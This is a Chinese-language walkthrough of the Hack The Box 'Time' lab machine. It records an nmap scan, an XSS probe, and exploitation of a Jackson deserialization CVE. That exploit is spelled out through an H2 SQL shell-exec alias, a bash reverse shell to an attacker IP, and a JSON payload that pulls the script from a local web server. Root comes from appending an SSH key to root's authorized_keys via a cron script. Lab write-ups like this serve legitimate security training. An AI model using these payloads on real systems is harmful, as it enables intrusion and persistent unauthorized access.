HTB time 10.10.10.214
sudo nmap -sS -Pn -p 1433,445,135,5985,3389,22,1521,3306,6379,5432,389,25,110,143,443,5900,21,873,27017,23,3690,1099,5984,5632,3389,80-100,7000-10000,13389,13306,11433,18080 -n --open --min-hostgroup 1024 --min-parallelism 1024 --host-timeout 30 -T4 -v 10.10.10.214
Warning: You specified a highly aggressive --min-hostgroup. Warning: Your --min-parallelism option is pretty high! This can hurt reliability. Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-10 13:13 CST WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm). Initiating SYN Stealth Scan at 13:13 Scanning 10.10.10.214 [3050 ports] Discovered open port 22/tcp on 10.10.10.214 Discovered open port 80/tcp on 10.10.10.214 Completed SYN Stealth Scan at 13:13, 1.98s elapsed (3050 total ports) Nmap scan report for 10.10.10.214 Host is up (0.20s latency). Not shown: 3048 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Read data files from: /usr/bin/../share/nmap Nmap done: 1 IP address (1 host up) scanned in 2.05 seconds Raw packets sent: 3051 (134.244KB) | Rcvd: 3050 (122.008KB)
vim /etc/hosts
10.10.10.214 time.htb
firefox time.htb
打开之后的页面,然后有两个选择,我在输入框当中输入了xss命令@ @ <script>alert(1234)</script>
返回了报错Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unexpected character ('<' (code 60)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')
标红的地方是java的函数,没有其他利用的点,只能查查这个函数有没有CVE了。
巨多,CVE-2019-12384具体指出了fasterXML,就它了。
github search CVE-2019-12384
1、python -m http.server web服务
2、写一个sql文件
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.8/4242 0>&1')
3、nc -lvnp 4242 开启一个监听端口
4、Validate(beta!)输入语句从web服务下载加载sql文件
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.8:8000/inject.sql'"}]"
连接成功之后直接到家目录下面拿flag值。(user flag)
然后上传linpeas看看有没有可以提权的办法。(虽然显示是ubuntu使用了最新的sudo提权CVE,但是失败了,没有任何卵用)
直接运行显示没有权限,chmod +x 赋予执行权限。
运行了linpeas行数显示不够,在终端当中设置History size
linpeas显示ROOT权限每分钟会运行一次脚本timer_backup.sh
查看一下.ssh目录下有没有ssh key
没有使用命令
ssh-keygen -rsa一直确认生成sshkey
然后将语句
echo ssh-rsa ssh.key >>/root/.ssh/authorized_keys
#ssh.key 是指具体的SSH.key并非字面上的ssh.key
写入到脚本timer_backup.sh当中
time会用ROOT权限运行timer_backup.sh脚本将ssh.key写入到timeSSHRoot权限当中,然后使用ssh连接time的ROOT用户,读取root flag。
远控木马:https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md
CVE-2019-12384:https://github.com/jas502n/CVE-2019-12384
